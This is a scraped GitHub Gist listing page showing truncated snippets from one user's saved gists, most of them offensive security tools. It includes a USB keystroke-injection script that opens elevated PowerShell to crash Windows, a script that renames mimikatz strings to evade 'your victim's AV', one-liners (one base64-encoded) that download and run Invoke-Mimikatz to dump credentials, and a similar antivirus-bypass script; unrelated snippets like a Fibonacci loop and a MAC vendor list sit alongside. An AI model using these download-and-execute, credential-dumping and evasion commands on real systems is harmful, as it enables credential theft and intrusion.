Skip to content

Instantly share code, notes, and snippets.

View JonnyBanana's full-sized avatar
🔥
Working from SapsLab

Jonny Banana JonnyBanana

🔥
Working from SapsLab
2k followers · 14.2k following
  • SappohSamaWorkshop - Circuit Circus
  • Bologna - Italy
View GitHub Profile
@JonnyBanana
JonnyBanana / Blue Screener
Created April 17, 2018 03:10
https://github.com/Kernel-ROM/Duck-Scripts/blob/master/Scripts/BlueScreener.txt
REM Title: BlueScreener
REM Note: Cheap and easy way to force a kernel panic (BSoD) in Windows
DELAY 4000
CONTROL ESCAPE
DELAY 200
STRING powershell
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 600
@JonnyBanana
JonnyBanana / mimikatz_obfuscator.sh
Created April 1, 2018 23:43 — forked from imaibou/mimikatz_obfuscator.sh
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
@JonnyBanana
JonnyBanana / Easy Fibonacci Sequence Calculator
Last active April 8, 2018 20:39
Easy Fibonacci Sequence Calculator in Python
a,b=0,1
while(b < WRITE THE MAXIMUM NUMBER OF THE SEQUENCE):
print(b)
a,b=b,a+b
### EXAMPLE, CALCULATE THE SEQUENCE UP TO NUMBER 1000000 ###
a,b=0,1
while(b < 1000000):
@JonnyBanana
JonnyBanana / Quick-Mimikatz
Created March 6, 2018 05:31 — forked from gfoss/Quick-Mimikatz
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
#encoded-mimikatz
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master
@cazala
cazala / m.js
Created December 13, 2017 16:13
var libUrl = null;
var scriptTag = Array.prototype.slice
.call(document.getElementsByTagName("script"))
.filter(x => /\?proxy?/.test(x.src));
if (scriptTag.length > 0) {
libUrl = scriptTag[0].src.split("m.js")[0];
} else {
throw new Error("missing '?proxy' query parameter in your proxy url!");
}
@tomykaira
tomykaira / java2smali.sh
Created September 9, 2017 17:52
Java to smali conversion, one liner.
#!/bin/sh
set -e
JAVA_HOME='/Applications/Android Studio.app/Contents/jre/jdk/Contents/Home'
cd /tmp
cat > input_tmp.java <<EOF
public class input_tmp {
public static void main(String[] args) {
@PaulSec
PaulSec / invoke_evasion.sh
Created August 1, 2017 13:50
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
@dafthack
dafthack / gist:8aa4ff60cd9352448a372ce1a7b2e27e
Created April 11, 2017 14:50
Easy Metasploit Install on Windows Subsystem for Linux
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux
1.) Enable Developer Mode
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1"
2.) Enable Windows Subsystem for Linux
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux
3.) Reboot
@aallan
aallan / mac-vendor.txt
Last active May 8, 2024 13:13
List of MAC addresses with vendors identities
000000 Officially Xerox
000001 SuperLAN-2U
000002 BBN (was internal usage only, no longer used)
000003 XEROX CORPORATION
000004 XEROX CORPORATION
000005 XEROX CORPORATION
000006 XEROX CORPORATION
000007 XEROX CORPORATION
000008 XEROX CORPORATION
000009 powerpipes?
@imaibou
imaibou / mimikatz_obfuscator.sh
Last active April 10, 2024 20:24
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'